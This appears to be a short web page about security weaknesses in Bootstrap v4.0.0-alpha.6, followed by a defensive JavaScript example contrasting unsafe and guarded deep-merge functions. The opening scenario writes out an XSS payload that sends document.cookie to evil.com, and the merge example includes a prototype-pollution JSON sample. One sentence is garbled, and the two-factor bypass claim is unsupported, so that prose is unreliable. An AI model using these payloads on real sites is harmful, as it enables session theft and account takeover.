
Vulnerabilities - Bootstrap V4.0.0-alpha.6

A customer renames themselves to "<img src=x onerror=fetch('https://evil.com/steal?cookie='+document.cookie)>". The tooltip plugin in alpha.6 fails to sanitize the name, and the attacker steals session cookies for the admin dashboard.

Unlike the final stable release of Bootstrap 4, alpha 6 was a bridge version that introduced as the default layout but lacked the security hardening of later versions.

Bootstrap v4.0.0-alpha.6 is a significant milestone in the development of Bootstrap 4, a major update to the framework. This alpha release marked a substantial shift towards a more modern and flexible design, introducing new components, utilities, and a revamped grid system. Although it's an alpha version, many developers and organizations adopted it for its promising features and improvements.

Because alpha.6 uses jQuery 3.1.1, the attacker then uses $.extend prototype pollution to disable two-factor authentication checks on the login form.
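
The prototype pollution mentioned above, seen from the defender's side in an added example (not from the original page and not jQuery's code): a recursive merge in the style of a deep extend, unguarded and guarded. The function names, the `demoFlag` property and the sample JSON body are constructed for illustration.

```javascript
// Recursive merge in the style of a deep "extend" (hypothetical helpers,
// not jQuery's implementation), shown unguarded and guarded.
const BLOCKED_KEYS = new Set(['__proto__', 'constructor', 'prototype']);

function isPlainObject(v) {
  return v !== null && typeof v === 'object' && !Array.isArray(v);
}

// Unguarded: follows every key, so an own "__proto__" key produced by
// JSON.parse makes the recursion write into Object.prototype.
function naiveDeepMerge(target, source) {
  for (const key in source) {
    const val = source[key];
    if (isPlainObject(val)) {
      if (!isPlainObject(target[key])) target[key] = {};
      naiveDeepMerge(target[key], val);
    } else {
      target[key] = val;
    }
  }
  return target;
}

// Guarded: copies own keys only, skips prototype-related keys, and never
// recurses into a value the target merely inherits.
function safeDeepMerge(target, source) {
  for (const key of Object.keys(source)) {
    if (BLOCKED_KEYS.has(key)) continue;
    const val = source[key];
    if (isPlainObject(val)) {
      const own = Object.prototype.hasOwnProperty.call(target, key);
      if (!own || !isPlainObject(target[key])) target[key] = {};
      safeDeepMerge(target[key], val);
    } else {
      target[key] = val;
    }
  }
  return target;
}

// Constructed sample of an untrusted JSON body reaching the merge.
const SAMPLE_BODY = '{"theme":{"dark":true},"__proto__":{"demoFlag":true}}';

function demo(mergeFn) {
  const settings = mergeFn({}, JSON.parse(SAMPLE_BODY));
  const leaked = ({}).demoFlag === true; // does an unrelated object inherit it?
  delete Object.prototype.demoFlag;      // clean up so each run is independent
  return { settings, leaked };
}
```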